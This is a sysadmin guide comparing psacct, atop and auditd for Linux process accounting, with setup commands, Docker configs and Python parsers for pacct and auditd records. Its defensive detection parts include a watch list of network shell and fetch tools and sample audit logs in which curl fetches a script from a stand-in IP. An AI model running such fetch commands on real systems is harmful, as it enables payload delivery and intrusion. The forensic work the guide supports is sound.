Introduction

Knowing exactly what ran on your server, who executed it, and how many resources it consumed is fundamental to both security auditing and capacity planning. Linux process accounting provides this forensic trail — recording every command executed, its resource usage, and termination status.

This guide compares three approaches to process accounting: psacct (the classic BSD-style accounting suite), atop (the advanced system/process monitor with daemon mode), and auditd (the Linux Audit Framework for security-focused process tracking). Each serves different use cases — from compliance auditing to real-time anomaly detection.

Comparison Table

Feature | psacct (acct) | atop (atopacctd) | auditd process tracking
--- | --- | --- | ---
Package | acct (Debian) / psacct (RHEL) | atop | auditd (Debian) / audit (RHEL); the audit subsystem itself is part of the kernel, auditd is the userspace daemon
Data format | Binary pacct file (/var/log/account/pacct on Debian, /var/account/pacct on RHEL) | Binary raw log per day under /var/log/atop/ | Text records in /var/log/audit/audit.log
Query tool | lastcomm, sa, ac | atop -r, atopsar | ausearch, aureport
Granularity | One record per process exit (command name only, no arguments) | Periodic sampling, plus exit records via atopacctd | Syscall-level (every execve, with arguments)
Resource tracking | CPU, memory, I/O counts, page faults | CPU, memory, disk, network | Syscall args, UIDs, exe path (no resource usage)
Overhead (rough) | ~1-2% CPU | ~2-5% CPU (daemon) | 5-15% (rule-dependent)
Storage per day (rough) | ~10-50 MB | ~50-200 MB | 100 MB to 5+ GB
Best for | Compliance, usage billing | Performance trending | Security forensics
Docker support | Host-level | Host + container stats | Host-level
Real-time alerts | No | No | Via audisp plugins

psacct: Classic BSD Process Accounting

psacct (package name acct on Debian, psacct on RHEL) is the traditional Unix process accounting system. Once accounting is switched on with accton, the kernel appends one fixed-size record to the accounting file for every process that terminates: who ran it (real UID), when it started, how long it ran, CPU and memory usage, exit status, and whether it used superuser privileges or was killed by a signal. Two limits matter for security use: the record holds only the first 16 bytes of the command name (no path, no arguments, so a renamed binary looks like whatever it was renamed to), and nothing is recorded about processes that are still running.

Installation

# Debian/Ubuntu
sudo apt install acct
sudo systemctl enable --now acct.service

# RHEL/Fedora (note the different unit name and file location)
sudo dnf install psacct
sudo systemctl enable --now psacct.service

# Or switch accounting on by hand; the target file must already exist
sudo /usr/sbin/accton /var/log/account/pacct   # Debian
sudo /usr/sbin/accton /var/account/pacct       # RHEL

# Verify: the kernel is writing to the file if its size grows
ls -l /var/log/account/pacct

Querying Accounting Data

# Recently executed commands, newest first. The flag column means:
# S = used superuser privileges, F = forked without exec,
# D = dumped core, X = killed by a signal
lastcomm | head -20

# Per-command summary (calls, elapsed time, CPU time, avg I/O, avg memory),
# sorted by CPU time (user+system) by default; the first line is the total
sa

# Per-user summary
sa -m

# One line per process record (user, CPU time, command)
sa -u | head -20

# Per-user login (connect) time; ac reads wtmp, not the pacct file
ac -p

# Daily connect-time totals
ac -d

# Commands run by a specific user
lastcomm --user www-data

# Top 10 CPU-consuming commands (line 1 is the total row)
sa | head -11
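lastcomm and sa are the usual readers, but the pacct file is simple enough to parse directly, which is useful when you want to run your own checks over it (or read a copy pulled from a compromised host onto an analysis machine). The following is an added example written for this guide, not code from GNU acct: it decodes struct acct_v3 records (64 bytes each, as defined in <linux/acct.h>), including the 16-bit comp_t counters, and flags records a reviewer would want to see: an unprivileged UID that used superuser privileges (the S flag lastcomm prints, set for setuid helpers such as sudo), processes ended by a signal or core dump, and CPU-heavy commands. The sample records are constructed in memory so it runs offline; the CPU threshold and the little-endian layout are assumptions stated in the code.

```python
"""Parse Linux process-accounting (pacct) records and flag ones worth a look.

Added example for this guide; it is not part of GNU acct. The layout follows
struct acct_v3 in <linux/acct.h> (64 bytes, written in the host's byte order;
this script assumes a little-endian host such as x86-64). The sample records
are constructed here so the script runs offline; on a real host feed
parse_pacct() the bytes of /var/log/account/pacct (Debian) or
/var/account/pacct (RHEL).
"""
import struct
from dataclasses import dataclass
from typing import Iterator, List, Tuple

# flag, version, tty, exitcode, uid, gid, pid, ppid, btime, etime (float),
# 8 x comp_t (utime, stime, mem, io, rw, minflt, majflt, swaps), comm[16]
ACCT_V3 = struct.Struct("<BBHIIIIIIfHHHHHHHH16s")
AHZ = 100                                   # accounting clock ticks per second
# ac_flag bits from <linux/acct.h>; lastcomm shows them as F, S, -, D, X
AFORK, ASU, ACOMPAT, ACORE, AXSIG = 0x01, 0x02, 0x04, 0x08, 0x10


def decode_comp_t(v: int) -> int:
    """comp_t packs a counter into 16 bits: 13-bit mantissa, 3-bit base-8 exponent."""
    return (v & 0x1FFF) << (3 * (v >> 13))


def encode_comp_t(value: int) -> int:
    """Inverse of decode_comp_t (truncating); used only to build the sample data."""
    exp = 0
    while value > 0x1FFF:
        value >>= 3
        exp += 1
    return (exp << 13) | value


@dataclass
class AcctRecord:
    comm: str          # first 16 bytes of the command name: no path, no arguments
    uid: int           # real uid of the process
    pid: int
    ppid: int
    btime: int         # start time, seconds since the epoch
    etime_s: float     # wall-clock seconds
    utime_s: float
    stime_s: float
    mem_kb: int        # average resident memory
    exitcode: int      # raw wait() status
    flags: int

    @property
    def cpu_s(self) -> float:
        return self.utime_s + self.stime_s

    def flag_names(self) -> List[str]:
        names = ((AFORK, "fork"), (ASU, "su"), (ACOMPAT, "compat"), (ACORE, "core"), (AXSIG, "xsig"))
        return [n for bit, n in names if self.flags & bit]


def parse_record(raw: bytes) -> AcctRecord:
    (flag, version, _tty, exitcode, uid, _gid, pid, ppid, btime, etime,
     utime, stime, mem, _io, _rw, _minflt, _majflt, _swaps, comm) = ACCT_V3.unpack(raw)
    if version != 3:
        raise ValueError(f"unsupported acct record version {version}")
    return AcctRecord(comm=comm.split(b"\0", 1)[0].decode("ascii", "replace"),
                      uid=uid, pid=pid, ppid=ppid, btime=btime, etime_s=etime / AHZ,
                      utime_s=decode_comp_t(utime) / AHZ, stime_s=decode_comp_t(stime) / AHZ,
                      mem_kb=decode_comp_t(mem), exitcode=exitcode, flags=flag)


def parse_pacct(data: bytes) -> Iterator[AcctRecord]:
    """Yield every complete record; a partial trailing record (host died mid-write) is skipped."""
    for off in range(0, len(data) - ACCT_V3.size + 1, ACCT_V3.size):
        yield parse_record(data[off:off + ACCT_V3.size])


def suspicious(records, cpu_threshold_s: float = 60.0) -> List[Tuple[AcctRecord, List[str]]]:
    """Records to review. The 60 s CPU threshold is an assumption for this example."""
    hits = []
    for r in records:
        reasons = []
        if r.flags & ASU and r.uid != 0:          # non-root uid used superuser privileges
            reasons.append("used superuser privileges")
        if r.flags & AXSIG:
            reasons.append("killed by signal" + (" (core dumped)" if r.flags & ACORE else ""))
        if r.cpu_s >= cpu_threshold_s:
            reasons.append(f"{r.cpu_s:.0f}s CPU")
        if reasons:
            hits.append((r, reasons))
    return hits


def make_record(comm, uid, pid, ppid, utime, stime, mem_kb=1024, exitcode=0, flags=0) -> bytes:
    """Build one acct_v3 record (times in ticks). Constructed test data, not kernel output."""
    return ACCT_V3.pack(flags, 3, 0, exitcode, uid, 1000, pid, ppid, 1718000000,
                        float(utime + stime + 5), encode_comp_t(utime), encode_comp_t(stime),
                        encode_comp_t(mem_kb), 0, 0, 0, 0, 0, comm.encode().ljust(16, b"\0"))


def sample_pacct() -> bytes:
    return b"".join([
        make_record("ls", 1000, 4101, 4100, 1, 1),
        make_record("sudo", 1000, 4102, 4100, 2, 3, flags=ASU),
        make_record("gzip", 33, 4103, 1, 12000, 0, mem_kb=65536),      # 120 s of CPU
        make_record("nginx", 33, 4104, 1, 5, 5, exitcode=0x8B, flags=ACORE | AXSIG),
    ]) + b"\x00" * 10   # simulate a truncated final record


if __name__ == "__main__":
    for rec, why in suspicious(parse_pacct(sample_pacct())):
        print(f"{rec.comm:<16} uid={rec.uid:<5} flags={','.join(rec.flag_names()) or '-':<10} {'; '.join(why)}")
```

Run it as-is to see the three flagged sample records; on a real host replace sample_pacct() with the contents of the pacct file. Because only the 16-byte command name is stored, treat a match here as a pointer into the auditd or atop data for that time window, not as proof of what binary actually ran.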

Docker-Based Process Accounting Dashboard

To make one host's accounting data browsable from a central dashboard, serve it over HTTP. The pacct file is binary, so the query endpoint has to shell out to lastcomm or sa rather than serve the file itself:

version: "3.8"
services:
  acct-collector:
    image: alpine:latest
    container_name: acct-collector
    command: |
      sh -c 'apk add --no-cache fcgiwrap spawn-fcgi nginx &&
             spawn-fcgi -s /run/fcgiwrap.sock -u nginx -g nginx /usr/bin/fcgiwrap &&
             nginx -g "daemon off;"'
    volumes:
      - /var/log/account:/data/acct:ro
      - ./nginx-acct.conf:/etc/nginx/http.d/default.conf:ro
      # the query script the NGINX config points at (its contents are not shown
      # here); it needs lastcomm/sa available inside the image
      - ./acct-query.sh:/usr/local/bin/acct-query.sh:ro
    ports:
      # accounting data is sensitive: bind to localhost and put an
      # authenticating reverse proxy in front instead of exposing 0.0.0.0
      - "127.0.0.1:8081:80"

NGINX config for the dashboard (nginx-acct.conf):

server {
    listen 80;
    # autoindex exposes the raw pacct file for download; keep this behind
    # authentication (see the port binding above)
    location / {
        root /data;
        autoindex on;
    }
    location /query {
        fastcgi_pass unix:/run/fcgiwrap.sock;
        fastcgi_param SCRIPT_FILENAME /usr/local/bin/acct-query.sh;
        include fastcgi_params;
    }
}

Log Rotation and Retention

# /etc/logrotate.d/psacct
# Debian's acct package ships its own daily rotation; add this only where no
# rotation exists. Use /var/account/pacct on RHEL.
/var/log/account/pacct {
    monthly
    rotate 12
    compress
    delaycompress
    missingok
    create 0600 root root
    postrotate
        # the kernel keeps writing to the renamed file until accton is
        # pointed at the newly created one
        /usr/sbin/accton /var/log/account/pacct
    endscript
}

atop: Advanced Performance Monitor with Process Accounting

atop is an interactive performance monitor that also runs as a daemon, writing system-wide and per-process samples to a daily raw log at a fixed interval (600 seconds by default). Sampling alone misses processes that start and exit between two samples; that is what atopacctd is for. It switches on kernel process accounting on atop's behalf and hands the exit records to atop, so each sample also lists every process that terminated since the previous one, with its CPU and memory usage. psacct itself does not miss crashed processes (the kernel writes the record on any termination, including a signal kill); the gap atopacctd closes is atop's own sampling interval.

Installation

# Debian/Ubuntu
sudo apt install atop

# atop.service writes the daily raw log; atopacct.service runs atopacctd,
# which enables kernel process accounting so atop also sees processes that
# exit between two samples
sudo systemctl enable --now atop.service atopacct.service

# RHEL/Fedora
sudo dnf install atop
sudo systemctl enable --now atop atopacct

# The logging interval (seconds) is set in /etc/default/atop (Debian) or
# /etc/sysconfig/atop (RHEL), e.g. LOGINTERVAL=600

Docker Deployment for Centralized Collection

version: "3.8"
services:
  atopd:
    image: debian:bookworm-slim
    container_name: atop-collector
    pid: host            # see the host's processes
    privileged: true     # atopacctd needs CAP_SYS_PACCT to enable kernel accounting
    command: |
      sh -c 'apt-get update && apt-get install -y --no-install-recommends atop &&
             mkdir -p /var/log/atop &&
             atopacctd &&
             exec atop -w /var/log/atop/atop_$$(date +%Y%m%d) 600'
    volumes:
      - /var/log/atop:/var/log/atop

Querying atop Data

# Interactive mode (live)
atop

# Review a day's raw log; step through samples with t / T
atop -r /var/log/atop/atop_20260601

# Only the samples between 08:00 and 09:00 of that log
atop -r /var/log/atop/atop_20260601 -b 08:00 -e 09:00

# System-level reports from today's log
atopsar -c    # CPU
atopsar -m    # Memory
atopsar -d    # Disk

# Top-3 CPU-consuming processes per sample within a time window
atopsar -O -b 08:00 -e 09:00

auditd: Security-Focused Process Tracking

auditd (Linux Audit Framework) records security-relevant events at the syscall level. For process accounting it captures every execve() call: the SYSCALL record carries the real, effective and login UIDs (auid, which survives su and sudo and therefore names the person behind the command), the terminal, session, and executable path; the matching EXECVE record carries the full argument vector, hex-encoded where an argument contains spaces or control bytes. This is forensic-grade detail, at the cost of the highest overhead and log volume of the three tools.

Installation

# Debian/Ubuntu (audispd-plugins provides the audisp dispatcher plugins used below)
sudo apt install auditd audispd-plugins

# RHEL/Fedora
sudo dnf install audit audit-libs

Process Tracking Rules

# Track all command executions (both syscall ABIs, or 32-bit binaries go unlogged)
sudo auditctl -a always,exit -F arch=b64 -S execve -k process-accounting
sudo auditctl -a always,exit -F arch=b32 -S execve -k process-accounting

# Make persistent
sudo tee /etc/audit/rules.d/process-accounting.rules << 'EOF'
-a always,exit -F arch=b64 -S execve -k process-accounting
-a always,exit -F arch=b32 -S execve -k process-accounting
EOF
sudo augenrules --load

# Verify the rules are loaded
sudo auditctl -l | grep process-accounting

Querying Process Audit Logs

# All command executions today (-i translates uids, syscall numbers and hex args)
ausearch -k process-accounting --start today -i

# Commands run under a specific login uid (auid): attributes sudo/su sessions
# to the person who logged in
ausearch -k process-accounting -ul 1000 --start today -i

# Commands whose real uid was 1000
ausearch -k process-accounting -ui 1000 --start today -i

# Failed exec attempts
ausearch -k process-accounting --success no --start today

# Executable summary report
aureport -x --summary

# Per-user report for the week
aureport -u --start this-week

# Find runs of tools often used to fetch payloads or open shells; -c matches the
# comm field exactly, avoiding substring hits that "grep nc" would produce
for c in nc ncat wget curl; do
    ausearch -k process-accounting -c "$c" --start today -i
done

Prometheus Integration via audisp

# /etc/audit/plugins.d/audisp-pipe.conf
# (audit 3.x; older releases read /etc/audisp/plugins.d/ instead)
active = yes
direction = out
path = /usr/local/bin/audit-metrics.sh
type = always
format = string

# /usr/local/bin/audit-metrics.sh  (root-owned, mode 0750)
#!/bin/bash
# Receives raw audit records on stdin from the audisp dispatcher, counts the
# EXECVE records (one per execve call) and publishes the running total for
# node_exporter's textfile collector. Writing to a temp file and renaming keeps
# the collector from reading a half-written file.
out=/var/lib/node_exporter/audit.prom
count=0
while IFS= read -r line; do
    case "$line" in
        *type=EXECVE*)
            count=$((count + 1))
            printf '# TYPE audit_execve_total counter\naudit_execve_total %d\n' "$count" > "$out.tmp"
            mv "$out.tmp" "$out" ;;
    esac
done

# Activate: auditd must be restarted through its init script on RHEL
# (systemctl refuses), e.g. "service auditd restart"

Choosing the Right Tool

Scenario | Recommended tool
--- | ---
Compliance: "track all user commands" (command names and resource use) | psacct
Compliance: "track all user commands" (with arguments and login uid) | auditd
Performance: "which commands use the most CPU?" | atop + atopacctd
Security: "who ran that suspicious binary?" | auditd
Resource billing: "charge per CPU-minute" | psacct + sa
Real-time anomaly detection | auditd + audisp
Historical trending and capacity planning | atop

Why Self-Host Process Accounting?

Process accounting data is sensitive — it contains a complete record of every command executed on your servers, including usernames, command arguments, and timing. Keeping this data on your own infrastructure ensures it is never exposed to third-party monitoring services. Self-hosting also means you control retention policies, can integrate directly with your SIEM or logging pipeline, and avoid per-host licensing costs.

For broader security monitoring context, see our auditd framework guide. For intrusion prevention, our fail2ban comparison covers complementary tools.

If you need kernel-level visibility beyond process tracking, the eBPF tracing guide covers modern observability approaches that work alongside traditional accounting.

Integration with SIEM and Log Aggregation

Process accounting data is most valuable when centralized. The pacct file is binary, so export it to text on the host first (for example a periodic lastcomm or sa -u run) and ship that with Filebeat or Vector to your Elasticsearch cluster; auditd events can be forwarded through an audisp plugin (the syslog plugin shipped with audispd-plugins) to a central syslog server. With events from every host in one place you can correlate on the login uid: for example, the same auid executing a suspicious command on several hosts within a short window. The combination of psacct for resource usage, auditd for forensics, and atop for performance trending gives complete operational visibility across your fleet.
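This is what the "suspicious commands" query in the auditd section and the cross-host correlation described above look like when done in code rather than by eye. The following is an added example written for this guide (not part of the audit package or ausearch): it reads the raw record format auditd writes to /var/log/audit/audit.log (also what ausearch --raw and an audisp plugin emit), joins the SYSCALL and EXECVE records of one execve() call by their audit(timestamp:serial) id, decodes quoted and hex-encoded arguments, matches a watch list, and reports any login uid that ran a watched command on more than one host within a time window. The host names, the watch list, the 300-second window and the log lines are all constructed for the example.

```python
"""Reconstruct execve() events from raw auditd records and correlate across hosts.

Added example for this guide; not part of the audit package. Input is auditd's
raw record format. Host names, the watch list, the window and the sample log
lines are constructed for the example.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

HEADER_RE = re.compile(r"^type=(\w+) msg=audit\((\d+\.\d+):(\d+)\): (.*)$")
FIELD_RE = re.compile(r'([\w\[\]]+)=("(?:[^"\\]|\\.)*"|\S+)')
UNSET_AUID = 4294967295                              # auid=-1: no login session (daemons)
WATCHED = {"curl", "wget", "nc", "ncat", "socat"}    # assumed watch list for the example


def decode_arg(raw: str) -> str:
    """EXECVE args are double-quoted, or hex-encoded when they hold spaces/control bytes."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1]
    return bytes.fromhex(raw).decode("utf-8", "replace")


@dataclass
class ExecEvent:
    host: str
    time: float
    serial: int
    fields: Dict[str, str] = field(default_factory=dict)   # SYSCALL record fields
    argv: List[str] = field(default_factory=list)           # decoded EXECVE arguments

    @property
    def auid(self) -> int:
        """Login uid: survives su/sudo, so it names the person behind the command."""
        return int(self.fields.get("auid", UNSET_AUID))

    @property
    def comm(self) -> str:
        return self.fields.get("comm", "").strip('"')


def parse_events(host: str, lines) -> List[ExecEvent]:
    """One ExecEvent per successful execve(); SYSCALL and EXECVE records share an id."""
    events: Dict[Tuple[str, str], ExecEvent] = {}
    for line in lines:
        m = HEADER_RE.match(line.strip())
        if not m:
            continue
        rtype, ts, serial, body = m.groups()
        ev = events.setdefault((ts, serial), ExecEvent(host, float(ts), int(serial)))
        kv = dict(FIELD_RE.findall(body))
        if rtype == "SYSCALL":
            ev.fields.update(kv)
        elif rtype == "EXECVE":
            ev.argv = [decode_arg(kv[f"a{i}"]) for i in range(int(kv.get("argc", 0))) if f"a{i}" in kv]
    return sorted((e for e in events.values() if e.argv and e.fields.get("success") == "yes"),
                  key=lambda e: e.time)


def watched_events(events: List[ExecEvent]) -> List[ExecEvent]:
    """Match on comm and on argv[0] basename (comm is truncated by the kernel)."""
    return [e for e in events if e.comm in WATCHED or e.argv[0].rsplit("/", 1)[-1] in WATCHED]


def correlate(events: List[ExecEvent], window_s: float = 300.0) -> List[Tuple[int, Tuple[str, ...]]]:
    """Login uids that ran a watched command on more than one host within window_s."""
    by_auid = defaultdict(list)
    for e in watched_events(events):
        if e.auid != UNSET_AUID:                     # never correlate on "no session"
            by_auid[e.auid].append(e)
    clusters = set()
    for auid, evs in by_auid.items():
        evs.sort(key=lambda e: e.time)
        for j, e in enumerate(evs):
            hosts = {x.host for x in evs[:j + 1] if e.time - x.time <= window_s}
            if len(hosts) > 1:
                clusters.add((auid, tuple(sorted(hosts))))
    return sorted(clusters)


# Constructed sample: auid 1000 fetches a script on two web hosts two minutes apart;
# an unrelated ls by auid 1001 on db1. Values are illustrative, not captured.
SAMPLE_LOGS = {
    "web1": """
type=SYSCALL msg=audit(1718000000.101:501): arch=c000003e syscall=59 success=yes exit=0 ppid=1200 pid=1234 auid=1000 uid=1000 gid=1000 euid=1000 tty=pts0 ses=3 comm="curl" exe="/usr/bin/curl" key="process-accounting"
type=EXECVE msg=audit(1718000000.101:501): argc=3 a0="curl" a1="-sSL" a2="http://203.0.113.10/setup.sh"
""",
    "web2": """
type=SYSCALL msg=audit(1718000120.500:77): arch=c000003e syscall=59 success=yes exit=0 ppid=900 pid=910 auid=1000 uid=1000 gid=1000 euid=1000 tty=pts1 ses=5 comm="wget" exe="/usr/bin/wget" key="process-accounting"
type=EXECVE msg=audit(1718000120.500:77): argc=3 a0="wget" a1="-O" a2=2F746D702F73657475702073637269707420322E7368
""",
    "db1": """
type=SYSCALL msg=audit(1718000130.000:12): arch=c000003e syscall=59 success=yes exit=0 ppid=400 pid=410 auid=1001 uid=1001 gid=1001 euid=1001 tty=pts0 ses=2 comm="ls" exe="/usr/bin/ls" key="process-accounting"
type=EXECVE msg=audit(1718000130.000:12): argc=2 a0="ls" a1="-la"
""",
}


def load_sample_events() -> List[ExecEvent]:
    return [e for host, text in SAMPLE_LOGS.items() for e in parse_events(host, text.splitlines())]


if __name__ == "__main__":
    evs = load_sample_events()
    for e in watched_events(evs):
        print(f"{e.host}: auid={e.auid} {' '.join(e.argv)}")
    for auid, hosts in correlate(evs):
        print(f"ALERT auid={auid} ran watched commands on {', '.join(hosts)} within 5 minutes")
```

In a pipeline the per-host lines would come from the forwarded audit stream with the host name attached by the shipper; parse_events is called once per host and the results pooled before correlate. Matching on argv[0] as well as comm matters because comm is the kernel's truncated process name, which an attacker controls by renaming the binary, whereas the path in exe and the argument vector come from the execve() call itself.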

FAQ

Does process accounting survive a reboot?

psacct: Yes. The binary log file persists across reboots, and accounting resumes automatically if the service is enabled. atop: Yes, logs persist in /var/log/atop/. auditd: Yes, rules in /etc/audit/rules.d/ are loaded at boot.

How much disk space does process accounting consume?

psacct typically uses 10-50 MB per day on a moderately busy server. atop uses 50-200 MB with default intervals. auditd with full execve() logging can consume 100 MB to 5+ GB per day depending on workload — configure disk space monitoring and use auditd’s max_log_file_action = rotate to prevent disk exhaustion.

Can I use process accounting inside Docker containers?

Process accounting runs at the host kernel level and captures all processes, including those in containers. Records carry the UID as the host kernel sees it, so with user namespaces a container's root shows up as the host UID it is mapped to, and the command name alone does not say which container it ran in. For container-specific accounting, use docker stats, atop's per-process container column, or deploy atop inside each container with host PID namespace access.

Is psacct still maintained?

The psacct/acct package is maintained in most distribution repositories as a stable, mature tool. The upstream source (GNU acct) receives minimal updates because the on-disk format is stable and the functionality is complete. For systems requiring active development, atop is updated regularly.

How does process accounting affect GDPR/privacy compliance?

Process accounting records constitute personal data under GDPR if they can be tied to a person, which they can whenever they carry a username or UID. You should: (1) document process accounting in your data processing registry, (2) configure retention periods, (3) restrict access to accounting logs, and (4) keep logs with numeric UIDs only (auditd's default; ausearch -i translates them to names at query time) and pseudonymize the UID-to-name mapping if records leave the security team.
